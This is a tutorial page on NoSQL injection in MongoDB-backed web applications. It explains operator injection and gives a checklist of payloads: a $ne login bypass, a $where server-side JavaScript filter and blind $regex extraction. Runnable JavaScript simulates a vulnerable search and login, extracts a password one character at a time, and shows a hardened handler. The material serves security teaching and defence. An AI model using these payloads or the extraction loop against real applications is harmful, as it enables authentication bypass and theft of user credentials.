NoSQL injection

What is it?

NoSQL injection occurs when an attacker controls part of a query sent to a NoSQL database through user input. Unlike SQL injection, the injected content is usually not a string fragment but a query operator (such as $ne or $regex) or a JavaScript expression that the application passes to the database unchanged.

A simple example:

  • A vulnerable web application has the endpoint /search?user={username}

  • When a request is made, the application builds a filter from the parameter and queries a NoSQL database (e.g., MongoDB) like this: db.users.find({username: username})

  • If the input reaches the query as structured data (a JSON body, or a query-string parser that supports bracket notation, such as qs, Express 4's default "extended" parser, which turns user[$ne]= into {"$ne": ""}), an attacker can replace the string with an operator object such as {"$ne": ""}. The query becomes db.users.find({username: {"$ne": ""}}), which matches every user with a non-empty username.

  • The vulnerable application sends this query to the database, potentially leaking all usernames.

  • Note that db.users.find({username: {$eq: username}}) is not vulnerable in this way: $eq compares the supplied value literally, so an injected {"$ne": ""} is treated as an embedded document rather than as an operator. Checking that the input is a string before it reaches the query is still the primary fix.

Payloads depend on the database, on the shape of the query and on how the application passes input through (JSON body, query-string parsing, or string concatenation into a $where expression). NoSQL injection can lead to:

  • Sensitive data exposure (e.g., every record returned by a filter that now matches everything)

  • Data manipulation (the same operator substitution in an update or delete filter)

  • Denial of service (e.g., a $where expression that runs expensive server-side JavaScript)

Other learning resources:

Writeups:

Have a good writeup & want to share it here? Drop me a message on LinkedIn.

Checklist:

Exploitation

# basic login bypass: the username must exist (or use {"$ne": ""} for it as well);
# {"$ne": ""} matches any non-empty password
{"username": "anyname", "password": {"$ne": ""}}
# retrieve data: $where evaluates server-side JavaScript, so it only works
# when JavaScript execution is enabled on the server
{"$where": "this.someField == 'someValue'"}
# blind: $regex turns the query into a yes/no oracle; anchor with ^ and extend
# the prefix one character at a time to extract the field's value
{"someField": {"$regex": "^someValue"}}
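The worked /search example above and the three checklist payloads, as an added example in runnable JavaScript (not code from the original page). It uses an in-memory stand-in for a MongoDB collection and a simplified bracket-notation query-string parser, both written for this example; the USERS data, the credentials and every function name are constructed assumptions.

```javascript
// Added example, not code from the original page. A minimal stand-in for a
// MongoDB collection and for a bracket-aware query-string parser, used to show
// (1) how /search?user[$ne]= becomes an operator object that matches every
// user, (2) a hardened handler, and (3) blind extraction with $regex.
// USERS is constructed sample data; all function names are assumptions.

const USERS = [
  { username: "alice", password: "s3cret!", role: "admin" },
  { username: "bob", password: "hunter2", role: "user" },
];

// Evaluates a MongoDB-style filter against one document. Only the operators
// used here are implemented. A plain value means equality, exactly as in
// MongoDB, which is what makes replacing it with an operator object work.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    const value = doc[field];
    if (cond === null || typeof cond !== "object") return value === cond;
    return Object.entries(cond).every(([op, arg]) => {
      switch (op) {
        case "$eq": return value === arg;
        case "$ne": return value !== arg;
        case "$regex": return new RegExp(arg).test(String(value));
        default: throw new Error(`operator ${op} not implemented in this example`);
      }
    });
  });
}

function find(filter) {
  return USERS.filter((doc) => matches(doc, filter));
}

function findOne(filter) {
  return find(filter)[0] || null;
}

// Parses "user[$ne]=" the way bracket-notation parsers such as qs (Express 4's
// default "extended" query parser) do: a[b]=c becomes { a: { b: "c" } }.
// Simplified to a single level of nesting.
function parseQueryString(qs) {
  const out = {};
  for (const part of qs.split("&")) {
    if (part === "") continue;
    const [rawKey, rawVal = ""] = part.split("=");
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = /^([^\[]+)\[([^\]]*)\]$/.exec(key);
    if (m) {
      out[m[1]] = out[m[1]] || {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Vulnerable handler for /search?user=...: the parsed value goes straight into
// the filter, so { $ne: "" } is interpreted as a query operator.
function searchVulnerable(queryString) {
  const { user } = parseQueryString(queryString);
  return find({ username: user }).map((u) => u.username);
}

// Hardened handler: refuse anything that is not a string, then wrap the value
// in $eq so the database compares it literally even if the check is bypassed.
function searchHardened(queryString) {
  const { user } = parseQueryString(queryString);
  if (typeof user !== "string") {
    throw new TypeError("username must be a string");
  }
  return find({ username: { $eq: user } }).map((u) => u.username);
}

// Login handler taking a JSON body, vulnerable in the same way: the checklist
// payload {"username": "alice", "password": {"$ne": ""}} matches any password.
function loginVulnerable(body) {
  return findOne({ username: body.username, password: body.password });
}

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Blind extraction: loginVulnerable only answers yes/no, but a $regex anchored
// at ^ confirms the password one character at a time.
function extractPassword(username, alphabet, maxLength = 64) {
  let known = "";
  for (let i = 0; i < maxLength; i++) {
    const next = [...alphabet].find((ch) =>
      loginVulnerable({ username, password: { $regex: "^" + escapeRegex(known + ch) } }) !== null
    );
    if (next === undefined) break; // no character extends the prefix: finished
    known += next;
  }
  return known;
}

const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789!";

console.log("vulnerable search:", searchVulnerable("user[$ne]="));
console.log("bypass logs in as:", loginVulnerable({ username: "alice", password: { $ne: "" } }).username);
console.log("extracted password:", extractPassword("alice", ALPHABET));
```

Run it with node. The type check in searchHardened is the important part: schema validation of the request (strings where strings are expected) stops operator objects before they reach the driver, and wrapping in $eq is a second layer. Middleware such as express-mongo-sanitize, which strips keys starting with $, is a third layer, but it does not help when input is concatenated into a $where string.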
